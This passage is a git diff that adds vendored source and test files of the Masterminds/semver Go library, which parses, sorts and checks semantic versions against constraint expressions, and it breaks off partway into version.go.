a/vendor/github.com/Masterminds/semver/collection.go b/vendor/github.com/Masterminds/semver/collection.go new file mode 100644 index 0000000000..a78235895f --- /dev/null +++ b/vendor/github.com/Masterminds/semver/collection.go @@ -0,0 +1,24 @@ +package semver + +// Collection is a collection of Version instances and implements the sort +// interface. See the sort package for more details. +// https://golang.org/pkg/sort/ +type Collection []*Version + +// Len returns the length of a collection. The number of Version instances +// on the slice. +func (c Collection) Len() int { + return len(c) +} + +// Less is needed for the sort interface to compare two Version objects on the +// slice. If checks if one is less than the other. +func (c Collection) Less(i, j int) bool { + return c[i].LessThan(c[j]) +} + +// Swap is needed for the sort interface to replace the Version objects +// at two different positions in the slice. +func (c Collection) Swap(i, j int) { + c[i], c[j] = c[j], c[i] +} diff --git a/vendor/github.com/Masterminds/semver/collection_test.go b/vendor/github.com/Masterminds/semver/collection_test.go new file mode 100644 index 0000000000..71b909c4e0 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/collection_test.go @@ -0,0 +1,46 @@ +package semver + +import ( + "reflect" + "sort" + "testing" +) + +func TestCollection(t *testing.T) { + raw := []string{ + "1.2.3", + "1.0", + "1.3", + "2", + "0.4.2", + } + + vs := make([]*Version, len(raw)) + for i, r := range raw { + v, err := NewVersion(r) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + vs[i] = v + } + + sort.Sort(Collection(vs)) + + e := []string{ + "0.4.2", + "1.0.0", + "1.2.3", + "1.3.0", + "2.0.0", + } + + a := make([]string, len(vs)) + for i, v := range vs { + a[i] = v.String() + } + + if !reflect.DeepEqual(a, e) { + t.Error("Sorting Collection failed") + } +} diff --git a/vendor/github.com/Masterminds/semver/constraints.go 
b/vendor/github.com/Masterminds/semver/constraints.go new file mode 100644 index 0000000000..a41a6a7a4a --- /dev/null +++ b/vendor/github.com/Masterminds/semver/constraints.go @@ -0,0 +1,426 @@ +package semver + +import ( + "errors" + "fmt" + "regexp" + "strings" +) + +// Constraints is one or more constraint that a semantic version can be +// checked against. +type Constraints struct { + constraints [][]*constraint +} + +// NewConstraint returns a Constraints instance that a Version instance can +// be checked against. If there is a parse error it will be returned. +func NewConstraint(c string) (*Constraints, error) { + + // Rewrite - ranges into a comparison operation. + c = rewriteRange(c) + + ors := strings.Split(c, "||") + or := make([][]*constraint, len(ors)) + for k, v := range ors { + cs := strings.Split(v, ",") + result := make([]*constraint, len(cs)) + for i, s := range cs { + pc, err := parseConstraint(s) + if err != nil { + return nil, err + } + + result[i] = pc + } + or[k] = result + } + + o := &Constraints{constraints: or} + return o, nil +} + +// Check tests if a version satisfies the constraints. +func (cs Constraints) Check(v *Version) bool { + // loop over the ORs and check the inner ANDs + for _, o := range cs.constraints { + joy := true + for _, c := range o { + if !c.check(v) { + joy = false + break + } + } + + if joy { + return true + } + } + + return false +} + +// Validate checks if a version satisfies a constraint. If not a slice of +// reasons for the failure are returned in addition to a bool. 
+func (cs Constraints) Validate(v *Version) (bool, []error) { + // loop over the ORs and check the inner ANDs + var e []error + for _, o := range cs.constraints { + joy := true + for _, c := range o { + if !c.check(v) { + em := fmt.Errorf(c.msg, v, c.orig) + e = append(e, em) + joy = false + } + } + + if joy { + return true, []error{} + } + } + + return false, e +} + +var constraintOps map[string]cfunc +var constraintMsg map[string]string +var constraintRegex *regexp.Regexp + +func init() { + constraintOps = map[string]cfunc{ + "": constraintTildeOrEqual, + "=": constraintTildeOrEqual, + "!=": constraintNotEqual, + ">": constraintGreaterThan, + "<": constraintLessThan, + ">=": constraintGreaterThanEqual, + "=>": constraintGreaterThanEqual, + "<=": constraintLessThanEqual, + "=<": constraintLessThanEqual, + "~": constraintTilde, + "~>": constraintTilde, + "^": constraintCaret, + } + + constraintMsg = map[string]string{ + "": "%s is not equal to %s", + "=": "%s is not equal to %s", + "!=": "%s is equal to %s", + ">": "%s is less than or equal to %s", + "<": "%s is greater than or equal to %s", + ">=": "%s is less than %s", + "=>": "%s is less than %s", + "<=": "%s is greater than %s", + "=<": "%s is greater than %s", + "~": "%s does not have same major and minor version as %s", + "~>": "%s does not have same major and minor version as %s", + "^": "%s does not have same major version as %s", + } + + ops := make([]string, 0, len(constraintOps)) + for k := range constraintOps { + ops = append(ops, regexp.QuoteMeta(k)) + } + + constraintRegex = regexp.MustCompile(fmt.Sprintf( + `^\s*(%s)\s*(%s)\s*$`, + strings.Join(ops, "|"), + cvRegex)) + + constraintRangeRegex = regexp.MustCompile(fmt.Sprintf( + `\s*(%s)\s+-\s+(%s)\s*`, + cvRegex, cvRegex)) +} + +// An individual constraint +type constraint struct { + // The callback function for the restraint. It performs the logic for + // the constraint. 
+ function cfunc + + msg string + + // The version used in the constraint check. For example, if a constraint + // is '<= 2.0.0' the con a version instance representing 2.0.0. + con *Version + + // The original parsed version (e.g., 4.x from != 4.x) + orig string + + // When an x is used as part of the version (e.g., 1.x) + minorDirty bool + dirty bool + patchDirty bool +} + +// Check if a version meets the constraint +func (c *constraint) check(v *Version) bool { + return c.function(v, c) +} + +type cfunc func(v *Version, c *constraint) bool + +func parseConstraint(c string) (*constraint, error) { + m := constraintRegex.FindStringSubmatch(c) + if m == nil { + return nil, fmt.Errorf("improper constraint: %s", c) + } + + ver := m[2] + orig := ver + minorDirty := false + patchDirty := false + dirty := false + if isX(m[3]) { + ver = "0.0.0" + dirty = true + } else if isX(strings.TrimPrefix(m[4], ".")) || m[4] == "" { + minorDirty = true + dirty = true + ver = fmt.Sprintf("%s.0.0%s", m[3], m[6]) + } else if isX(strings.TrimPrefix(m[5], ".")) { + dirty = true + patchDirty = true + ver = fmt.Sprintf("%s%s.0%s", m[3], m[4], m[6]) + } + + con, err := NewVersion(ver) + if err != nil { + + // The constraintRegex should catch any regex parsing errors. So, + // we should never get here. + return nil, errors.New("constraint Parser Error") + } + + cs := &constraint{ + function: constraintOps[m[1]], + msg: constraintMsg[m[1]], + con: con, + orig: orig, + minorDirty: minorDirty, + patchDirty: patchDirty, + dirty: dirty, + } + return cs, nil +} + +// Constraint functions +func constraintNotEqual(v *Version, c *constraint) bool { + if c.dirty { + + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. 
+ if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if c.con.Major() != v.Major() { + return true + } + if c.con.Minor() != v.Minor() && !c.minorDirty { + return true + } else if c.minorDirty { + return false + } + + return false + } + + return !v.Equal(c.con) +} + +func constraintGreaterThan(v *Version, c *constraint) bool { + + // An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease + // exists. This that case. + if !isNonZero(c.con) && isNonZero(v) { + return true + } + + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + return v.Compare(c.con) == 1 +} + +func constraintLessThan(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if !c.dirty { + return v.Compare(c.con) < 0 + } + + if v.Major() > c.con.Major() { + return false + } else if v.Minor() > c.con.Minor() && !c.minorDirty { + return false + } + + return true +} + +func constraintGreaterThanEqual(v *Version, c *constraint) bool { + // An edge case the constraint is 0.0.0 and the version is 0.0.0-someprerelease + // exists. This that case. + if !isNonZero(c.con) && isNonZero(v) { + return true + } + + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. 
+ if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + return v.Compare(c.con) >= 0 +} + +func constraintLessThanEqual(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if !c.dirty { + return v.Compare(c.con) <= 0 + } + + if v.Major() > c.con.Major() { + return false + } else if v.Minor() > c.con.Minor() && !c.minorDirty { + return false + } + + return true +} + +// ~*, ~>* --> >= 0.0.0 (any) +// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0, <3.0.0 +// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0, <2.1.0 +// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0, <1.3.0 +// ~1.2.3, ~>1.2.3 --> >=1.2.3, <1.3.0 +// ~1.2.0, ~>1.2.0 --> >=1.2.0, <1.3.0 +func constraintTilde(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if v.LessThan(c.con) { + return false + } + + // ~0.0.0 is a special case where all constraints are accepted. It's + // equivalent to >= 0.0.0. + if c.con.Major() == 0 && c.con.Minor() == 0 && c.con.Patch() == 0 && + !c.minorDirty && !c.patchDirty { + return true + } + + if v.Major() != c.con.Major() { + return false + } + + if v.Minor() != c.con.Minor() && !c.minorDirty { + return false + } + + return true +} + +// When there is a .x (dirty) status it automatically opts in to ~. Otherwise +// it's a straight = +func constraintTildeOrEqual(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. 
+ if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if c.dirty { + c.msg = constraintMsg["~"] + return constraintTilde(v, c) + } + + return v.Equal(c.con) +} + +// ^* --> (any) +// ^2, ^2.x, ^2.x.x --> >=2.0.0, <3.0.0 +// ^2.0, ^2.0.x --> >=2.0.0, <3.0.0 +// ^1.2, ^1.2.x --> >=1.2.0, <2.0.0 +// ^1.2.3 --> >=1.2.3, <2.0.0 +// ^1.2.0 --> >=1.2.0, <2.0.0 +func constraintCaret(v *Version, c *constraint) bool { + // If there is a pre-release on the version but the constraint isn't looking + // for them assume that pre-releases are not compatible. See issue 21 for + // more details. + if v.Prerelease() != "" && c.con.Prerelease() == "" { + return false + } + + if v.LessThan(c.con) { + return false + } + + if v.Major() != c.con.Major() { + return false + } + + return true +} + +var constraintRangeRegex *regexp.Regexp + +const cvRegex string = `v?([0-9|x|X|\*]+)(\.[0-9|x|X|\*]+)?(\.[0-9|x|X|\*]+)?` + + `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + + `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + +func isX(x string) bool { + switch x { + case "x", "*", "X": + return true + default: + return false + } +} + +func rewriteRange(i string) string { + m := constraintRangeRegex.FindAllStringSubmatch(i, -1) + if m == nil { + return i + } + o := i + for _, v := range m { + t := fmt.Sprintf(">= %s, <= %s", v[1], v[11]) + o = strings.Replace(o, v[0], t, 1) + } + + return o +} + +// Detect if a version is not zero (0.0.0) +func isNonZero(v *Version) bool { + if v.Major() != 0 || v.Minor() != 0 || v.Patch() != 0 || v.Prerelease() != "" { + return true + } + + return false +} diff --git a/vendor/github.com/Masterminds/semver/constraints_test.go b/vendor/github.com/Masterminds/semver/constraints_test.go new file mode 100644 index 0000000000..bf52c90bd2 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/constraints_test.go @@ -0,0 +1,465 @@ +package semver + +import ( + "reflect" + "testing" +) + +func TestParseConstraint(t *testing.T) { + tests := []struct { + 
in string + f cfunc + v string + err bool + }{ + {">= 1.2", constraintGreaterThanEqual, "1.2.0", false}, + {"1.0", constraintTildeOrEqual, "1.0.0", false}, + {"foo", nil, "", true}, + {"<= 1.2", constraintLessThanEqual, "1.2.0", false}, + {"=< 1.2", constraintLessThanEqual, "1.2.0", false}, + {"=> 1.2", constraintGreaterThanEqual, "1.2.0", false}, + {"v1.2", constraintTildeOrEqual, "1.2.0", false}, + {"=1.5", constraintTildeOrEqual, "1.5.0", false}, + {"> 1.3", constraintGreaterThan, "1.3.0", false}, + {"< 1.4.1", constraintLessThan, "1.4.1", false}, + } + + for _, tc := range tests { + c, err := parseConstraint(tc.in) + if tc.err && err == nil { + t.Errorf("Expected error for %s didn't occur", tc.in) + } else if !tc.err && err != nil { + t.Errorf("Unexpected error for %s", tc.in) + } + + // If an error was expected continue the loop and don't try the other + // tests as they will cause errors. + if tc.err { + continue + } + + if tc.v != c.con.String() { + t.Errorf("Incorrect version found on %s", tc.in) + } + + f1 := reflect.ValueOf(tc.f) + f2 := reflect.ValueOf(c.function) + if f1 != f2 { + t.Errorf("Wrong constraint found for %s", tc.in) + } + } +} + +func TestConstraintCheck(t *testing.T) { + tests := []struct { + constraint string + version string + check bool + }{ + {"= 2.0", "1.2.3", false}, + {"= 2.0", "2.0.0", true}, + {"4.1", "4.1.0", true}, + {"!=4.1", "4.1.0", false}, + {"!=4.1", "5.1.0", true}, + {">1.1", "4.1.0", true}, + {">1.1", "1.1.0", false}, + {"<1.1", "0.1.0", true}, + {"<1.1", "1.1.0", false}, + {"<1.1", "1.1.1", false}, + {">=1.1", "4.1.0", true}, + {">=1.1", "1.1.0", true}, + {">=1.1", "0.0.9", false}, + {"<=1.1", "0.1.0", true}, + {"<=1.1", "1.1.0", true}, + {"<=1.1", "1.1.1", false}, + {">0", "0.0.1-alpha", true}, + {">=0", "0.0.1-alpha", true}, + {">0", "0", false}, + {">=0", "0", true}, + {"=0", "1", false}, + } + + for _, tc := range tests { + c, err := parseConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + 
continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + a := c.check(v) + if a != tc.check { + t.Errorf("Constraint %q failing with %q", tc.constraint, tc.version) + } + } +} + +func TestNewConstraint(t *testing.T) { + tests := []struct { + input string + ors int + count int + err bool + }{ + {">= 1.1", 1, 1, false}, + {"2.0", 1, 1, false}, + {"v2.3.5-20161202202307-sha.e8fc5e5", 1, 1, false}, + {">= bar", 0, 0, true}, + {">= 1.2.3, < 2.0", 1, 2, false}, + {">= 1.2.3, < 2.0 || => 3.0, < 4", 2, 2, false}, + + // The 3 - 4 should be broken into 2 by the range rewriting + {"3 - 4 || => 3.0, < 4", 2, 2, false}, + } + + for _, tc := range tests { + v, err := NewConstraint(tc.input) + if tc.err && err == nil { + t.Errorf("expected but did not get error for: %s", tc.input) + continue + } else if !tc.err && err != nil { + t.Errorf("unexpectederror for input %s: %s", tc.input, err) + continue + } + if tc.err { + continue + } + + l := len(v.constraints) + if tc.ors != l { + t.Errorf("Expected %s to have %d ORs but got %d", + tc.input, tc.ors, l) + } + + l = len(v.constraints[0]) + if tc.count != l { + t.Errorf("Expected %s to have %d constraints but got %d", + tc.input, tc.count, l) + } + } +} + +func TestConstraintsCheck(t *testing.T) { + tests := []struct { + constraint string + version string + check bool + }{ + {"*", "1.2.3", true}, + {"~0.0.0", "1.2.3", true}, + {"0.x.x", "1.2.3", false}, + {"0.0.x", "1.2.3", false}, + {"0.0.0", "1.2.3", false}, + {"*", "1.2.3", true}, + {"^0.0.0", "1.2.3", false}, + {"= 2.0", "1.2.3", false}, + {"= 2.0", "2.0.0", true}, + {"4.1", "4.1.0", true}, + {"4.1.x", "4.1.3", true}, + {"1.x", "1.4", true}, + {"!=4.1", "4.1.0", false}, + {"!=4.1-alpha", "4.1.0-alpha", false}, + {"!=4.1-alpha", "4.1.0", true}, + {"!=4.1", "5.1.0", true}, + {"!=4.x", "5.1.0", true}, + {"!=4.x", "4.1.0", false}, + {"!=4.1.x", "4.2.0", true}, + {"!=4.2.x", "4.2.3", false}, + {">1.1", "4.1.0", true}, + {">1.1", 
"1.1.0", false}, + {"<1.1", "0.1.0", true}, + {"<1.1", "1.1.0", false}, + {"<1.1", "1.1.1", false}, + {"<1.x", "1.1.1", true}, + {"<1.x", "2.1.1", false}, + {"<1.1.x", "1.2.1", false}, + {"<1.1.x", "1.1.500", true}, + {"<1.2.x", "1.1.1", true}, + {">=1.1", "4.1.0", true}, + {">=1.1", "4.1.0-beta", false}, + {">=1.1", "1.1.0", true}, + {">=1.1", "0.0.9", false}, + {"<=1.1", "0.1.0", true}, + {"<=1.1", "0.1.0-alpha", false}, + {"<=1.1-a", "0.1.0-alpha", true}, + {"<=1.1", "1.1.0", true}, + {"<=1.x", "1.1.0", true}, + {"<=2.x", "3.1.0", false}, + {"<=1.1", "1.1.1", false}, + {"<=1.1.x", "1.2.500", false}, + {">1.1, <2", "1.1.1", true}, + {">1.1, <3", "4.3.2", false}, + {">=1.1, <2, !=1.2.3", "1.2.3", false}, + {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true}, + {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true}, + {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", false}, + {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false}, + {"1.1 - 2", "1.1.1", true}, + {"1.1-3", "4.3.2", false}, + {"^1.1", "1.1.1", true}, + {"^1.1", "4.3.2", false}, + {"^1.x", "1.1.1", true}, + {"^2.x", "1.1.1", false}, + {"^1.x", "2.1.1", false}, + {"^1.x", "1.1.1-beta1", false}, + {"^1.1.2-alpha", "1.2.1-beta1", true}, + {"^1.2.x-alpha", "1.1.1-beta1", false}, + {"~*", "2.1.1", true}, + {"~1", "2.1.1", false}, + {"~1", "1.3.5", true}, + {"~1", "1.4", true}, + {"~1.x", "2.1.1", false}, + {"~1.x", "1.3.5", true}, + {"~1.x", "1.4", true}, + {"~1.1", "1.1.1", true}, + {"~1.1", "1.1.1-alpha", false}, + {"~1.1-alpha", "1.1.1-beta", true}, + {"~1.1.1-beta", "1.1.1-alpha", false}, + {"~1.1.1-beta", "1.1.1", true}, + {"~1.2.3", "1.2.5", true}, + {"~1.2.3", "1.2.2", false}, + {"~1.2.3", "1.3.2", false}, + {"~1.1", "1.2.3", false}, + {"~1.3", "2.4.5", false}, + } + + for _, tc := range tests { + c, err := NewConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + a := c.Check(v) + if a != tc.check { + 
t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version) + } + } +} + +func TestRewriteRange(t *testing.T) { + tests := []struct { + c string + nc string + }{ + {"2 - 3", ">= 2, <= 3"}, + {"2 - 3, 2 - 3", ">= 2, <= 3,>= 2, <= 3"}, + {"2 - 3, 4.0.0 - 5.1", ">= 2, <= 3,>= 4.0.0, <= 5.1"}, + } + + for _, tc := range tests { + o := rewriteRange(tc.c) + + if o != tc.nc { + t.Errorf("Range %s rewritten incorrectly as '%s'", tc.c, o) + } + } +} + +func TestIsX(t *testing.T) { + tests := []struct { + t string + c bool + }{ + {"A", false}, + {"%", false}, + {"X", true}, + {"x", true}, + {"*", true}, + } + + for _, tc := range tests { + a := isX(tc.t) + if a != tc.c { + t.Errorf("Function isX error on %s", tc.t) + } + } +} + +func TestConstraintsValidate(t *testing.T) { + tests := []struct { + constraint string + version string + check bool + }{ + {"*", "1.2.3", true}, + {"~0.0.0", "1.2.3", true}, + {"= 2.0", "1.2.3", false}, + {"= 2.0", "2.0.0", true}, + {"4.1", "4.1.0", true}, + {"4.1.x", "4.1.3", true}, + {"1.x", "1.4", true}, + {"!=4.1", "4.1.0", false}, + {"!=4.1", "5.1.0", true}, + {"!=4.x", "5.1.0", true}, + {"!=4.x", "4.1.0", false}, + {"!=4.1.x", "4.2.0", true}, + {"!=4.2.x", "4.2.3", false}, + {">1.1", "4.1.0", true}, + {">1.1", "1.1.0", false}, + {"<1.1", "0.1.0", true}, + {"<1.1", "1.1.0", false}, + {"<1.1", "1.1.1", false}, + {"<1.x", "1.1.1", true}, + {"<1.x", "2.1.1", false}, + {"<1.1.x", "1.2.1", false}, + {"<1.1.x", "1.1.500", true}, + {"<1.2.x", "1.1.1", true}, + {">=1.1", "4.1.0", true}, + {">=1.1", "1.1.0", true}, + {">=1.1", "0.0.9", false}, + {"<=1.1", "0.1.0", true}, + {"<=1.1", "1.1.0", true}, + {"<=1.x", "1.1.0", true}, + {"<=2.x", "3.1.0", false}, + {"<=1.1", "1.1.1", false}, + {"<=1.1.x", "1.2.500", false}, + {">1.1, <2", "1.1.1", true}, + {">1.1, <3", "4.3.2", false}, + {">=1.1, <2, !=1.2.3", "1.2.3", false}, + {">=1.1, <2, !=1.2.3 || > 3", "3.1.2", true}, + {">=1.1, <2, !=1.2.3 || >= 3", "3.0.0", true}, + {">=1.1, <2, !=1.2.3 || > 
3", "3.0.0", false}, + {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", false}, + {"1.1 - 2", "1.1.1", true}, + {"1.1-3", "4.3.2", false}, + {"^1.1", "1.1.1", true}, + {"^1.1", "1.1.1-alpha", false}, + {"^1.1.1-alpha", "1.1.1-beta", true}, + {"^1.1.1-beta", "1.1.1-alpha", false}, + {"^1.1", "4.3.2", false}, + {"^1.x", "1.1.1", true}, + {"^2.x", "1.1.1", false}, + {"^1.x", "2.1.1", false}, + {"~*", "2.1.1", true}, + {"~1", "2.1.1", false}, + {"~1", "1.3.5", true}, + {"~1", "1.3.5-beta", false}, + {"~1.x", "2.1.1", false}, + {"~1.x", "1.3.5", true}, + {"~1.x", "1.3.5-beta", false}, + {"~1.3.6-alpha", "1.3.5-beta", false}, + {"~1.3.5-alpha", "1.3.5-beta", true}, + {"~1.3.5-beta", "1.3.5-alpha", false}, + {"~1.x", "1.4", true}, + {"~1.1", "1.1.1", true}, + {"~1.2.3", "1.2.5", true}, + {"~1.2.3", "1.2.2", false}, + {"~1.2.3", "1.3.2", false}, + {"~1.1", "1.2.3", false}, + {"~1.3", "2.4.5", false}, + } + + for _, tc := range tests { + c, err := NewConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + a, msgs := c.Validate(v) + if a != tc.check { + t.Errorf("Constraint '%s' failing with '%s'", tc.constraint, tc.version) + } else if !a && len(msgs) == 0 { + t.Errorf("%q failed with %q but no errors returned", tc.constraint, tc.version) + } + + // if a == false { + // for _, m := range msgs { + // t.Errorf("%s", m) + // } + // } + } + + v, err := NewVersion("1.2.3") + if err != nil { + t.Errorf("err: %s", err) + } + + c, err := NewConstraint("!= 1.2.5, ^2, <= 1.1.x") + if err != nil { + t.Errorf("err: %s", err) + } + + _, msgs := c.Validate(v) + if len(msgs) != 2 { + t.Error("Invalid number of validations found") + } + e := msgs[0].Error() + if e != "1.2.3 does not have same major version as 2" { + t.Error("Did not get expected message: 1.2.3 does not have same major version as 2") + } + e = msgs[1].Error() + if e != "1.2.3 is greater than 1.1.x" { + 
t.Error("Did not get expected message: 1.2.3 is greater than 1.1.x") + } + + tests2 := []struct { + constraint, version, msg string + }{ + {"= 2.0", "1.2.3", "1.2.3 is not equal to 2.0"}, + {"!=4.1", "4.1.0", "4.1.0 is equal to 4.1"}, + {"!=4.x", "4.1.0", "4.1.0 is equal to 4.x"}, + {"!=4.2.x", "4.2.3", "4.2.3 is equal to 4.2.x"}, + {">1.1", "1.1.0", "1.1.0 is less than or equal to 1.1"}, + {"<1.1", "1.1.0", "1.1.0 is greater than or equal to 1.1"}, + {"<1.1", "1.1.1", "1.1.1 is greater than or equal to 1.1"}, + {"<1.x", "2.1.1", "2.1.1 is greater than or equal to 1.x"}, + {"<1.1.x", "1.2.1", "1.2.1 is greater than or equal to 1.1.x"}, + {">=1.1", "0.0.9", "0.0.9 is less than 1.1"}, + {"<=2.x", "3.1.0", "3.1.0 is greater than 2.x"}, + {"<=1.1", "1.1.1", "1.1.1 is greater than 1.1"}, + {"<=1.1.x", "1.2.500", "1.2.500 is greater than 1.1.x"}, + {">1.1, <3", "4.3.2", "4.3.2 is greater than or equal to 3"}, + {">=1.1, <2, !=1.2.3", "1.2.3", "1.2.3 is equal to 1.2.3"}, + {">=1.1, <2, !=1.2.3 || > 3", "3.0.0", "3.0.0 is greater than or equal to 2"}, + {">=1.1, <2, !=1.2.3 || > 3", "1.2.3", "1.2.3 is equal to 1.2.3"}, + {"1.1 - 3", "4.3.2", "4.3.2 is greater than 3"}, + {"^1.1", "4.3.2", "4.3.2 does not have same major version as 1.1"}, + {"^2.x", "1.1.1", "1.1.1 does not have same major version as 2.x"}, + {"^1.x", "2.1.1", "2.1.1 does not have same major version as 1.x"}, + {"~1", "2.1.2", "2.1.2 does not have same major and minor version as 1"}, + {"~1.x", "2.1.1", "2.1.1 does not have same major and minor version as 1.x"}, + {"~1.2.3", "1.2.2", "1.2.2 does not have same major and minor version as 1.2.3"}, + {"~1.2.3", "1.3.2", "1.3.2 does not have same major and minor version as 1.2.3"}, + {"~1.1", "1.2.3", "1.2.3 does not have same major and minor version as 1.1"}, + {"~1.3", "2.4.5", "2.4.5 does not have same major and minor version as 1.3"}, + } + + for _, tc := range tests2 { + c, err := NewConstraint(tc.constraint) + if err != nil { + t.Errorf("err: %s", err) + 
continue + } + + v, err := NewVersion(tc.version) + if err != nil { + t.Errorf("err: %s", err) + continue + } + + _, msgs := c.Validate(v) + e := msgs[0].Error() + if e != tc.msg { + t.Errorf("Did not get expected message %q: %s", tc.msg, e) + } + } +} diff --git a/vendor/github.com/Masterminds/semver/doc.go b/vendor/github.com/Masterminds/semver/doc.go new file mode 100644 index 0000000000..e00f65eb73 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/doc.go @@ -0,0 +1,115 @@ +/* +Package semver provides the ability to work with Semantic Versions (http://semver.org) in Go. + +Specifically it provides the ability to: + + * Parse semantic versions + * Sort semantic versions + * Check if a semantic version fits within a set of constraints + * Optionally work with a `v` prefix + +Parsing Semantic Versions + +To parse a semantic version use the `NewVersion` function. For example, + + v, err := semver.NewVersion("1.2.3-beta.1+build345") + +If there is an error the version wasn't parseable. The version object has methods +to get the parts of the version, compare it to other versions, convert the +version back into a string, and get the original string. For more details +please see the documentation at https://godoc.org/github.com/Masterminds/semver. + +Sorting Semantic Versions + +A set of versions can be sorted using the `sort` package from the standard library. +For example, + + raw := []string{"1.2.3", "1.0", "1.3", "2", "0.4.2",} + vs := make([]*semver.Version, len(raw)) + for i, r := range raw { + v, err := semver.NewVersion(r) + if err != nil { + t.Errorf("Error parsing version: %s", err) + } + + vs[i] = v + } + + sort.Sort(semver.Collection(vs)) + +Checking Version Constraints + +Checking a version against version constraints is one of the most featureful +parts of the package. + + c, err := semver.NewConstraint(">= 1.2.3") + if err != nil { + // Handle constraint not being parseable. 
+ } + + v, _ := semver.NewVersion("1.3") + if err != nil { + // Handle version not being parseable. + } + // Check if the version meets the constraints. The a variable will be true. + a := c.Check(v) + +Basic Comparisons + +There are two elements to the comparisons. First, a comparison string is a list +of comma separated and comparisons. These are then separated by || separated or +comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a +comparison that's greater than or equal to 1.2 and less than 3.0.0 or is +greater than or equal to 4.2.3. + +The basic comparisons are: + + * `=`: equal (aliased to no operator) + * `!=`: not equal + * `>`: greater than + * `<`: less than + * `>=`: greater than or equal to + * `<=`: less than or equal to + +Hyphen Range Comparisons + +There are multiple methods to handle ranges and the first is hyphens ranges. +These look like: + + * `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5` + * `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5` + +Wildcards In Comparisons + +The `x`, `X`, and `*` characters can be used as a wildcard character. This works +for all comparison operators. When used on the `=` operator it falls +back to the pack level comparison (see tilde below). For example, + + * `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` + * `>= 1.2.x` is equivalent to `>= 1.2.0` + * `<= 2.x` is equivalent to `<= 3` + * `*` is equivalent to `>= 0.0.0` + +Tilde Range Comparisons (Patch) + +The tilde (`~`) comparison operator is for patch level ranges when a minor +version is specified and major level changes when the minor number is missing. +For example, + + * `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0` + * `~1` is equivalent to `>= 1, < 2` + * `~2.3` is equivalent to `>= 2.3, < 2.4` + * `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0` + * `~1.x` is equivalent to `>= 1, < 2` + +Caret Range Comparisons (Major) + +The caret (`^`) comparison operator is for major level changes. 
This is useful +when comparisons of API versions as a major change is API breaking. For example, + + * `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0` + * `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0` + * `^2.3` is equivalent to `>= 2.3, < 3` + * `^2.x` is equivalent to `>= 2.0.0, < 3` +*/ +package semver diff --git a/vendor/github.com/Masterminds/semver/version.go b/vendor/github.com/Masterminds/semver/version.go new file mode 100644 index 0000000000..9d22ea6308 --- /dev/null +++ b/vendor/github.com/Masterminds/semver/version.go @@ -0,0 +1,421 @@ +package semver + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "regexp" + "strconv" + "strings" +) + +// The compiled version of the regex created at init() is cached here so it +// only needs to be created once. +var versionRegex *regexp.Regexp +var validPrereleaseRegex *regexp.Regexp + +var ( + // ErrInvalidSemVer is returned a version is found to be invalid when + // being parsed. + ErrInvalidSemVer = errors.New("Invalid Semantic Version") + + // ErrInvalidMetadata is returned when the metadata is an invalid format + ErrInvalidMetadata = errors.New("Invalid Metadata string") + + // ErrInvalidPrerelease is returned when the pre-release is an invalid format + ErrInvalidPrerelease = errors.New("Invalid Prerelease string") +) + +// SemVerRegex is the regular expression used to parse a semantic version. +const SemVerRegex string = `v?([0-9]+)(\.[0-9]+)?(\.[0-9]+)?` + + `(-([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + + `(\+([0-9A-Za-z\-]+(\.[0-9A-Za-z\-]+)*))?` + +// ValidPrerelease is the regular expression which validates 